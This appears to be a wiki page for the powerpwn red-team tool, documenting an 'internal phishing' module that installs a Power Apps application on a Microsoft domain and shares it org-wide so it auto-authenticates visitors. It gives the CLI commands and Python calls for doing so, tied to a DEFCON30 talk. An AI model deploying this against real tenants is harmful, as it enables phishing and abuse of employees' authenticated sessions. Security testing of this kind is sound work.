Modules: Internal phishing
lanasalameh1 edited this page Aug 2, 2023 · 12 revisions
Set up an internal phishing application on a Microsoft-owned domain which will automatically authenticate as users browse to your link.
This capability was first presented at a DEFCON30 talk titled "Low Code High Risk - Enterprise Domination via Low Code Abuse".
- Install application by running
  `powerpwn phishing install-app -t {tenant-id} -e {environment-id} --input {path to application package zip} -n {application name}`
- Get application id and application run url from cmd
- Share application with org by running
  `powerpwn phishing share-app -t {tenant-id} -e {environment-id} -a {app id}`
```python
from powerpwn.powerphishing.app_installer import AppInstaller

app_installer = AppInstaller(token="")  # access token to powerapps

# Install the application package (zip) into the environment
app_installer.install_app(path_to_zip_file="", app_display_name="", env_id="")

# Share the installed application with the org
app_installer.share_app_with_org(app_id="", environment_id="", tenant_id="")
```
Caveat:
Applications with related resources are not yet supported.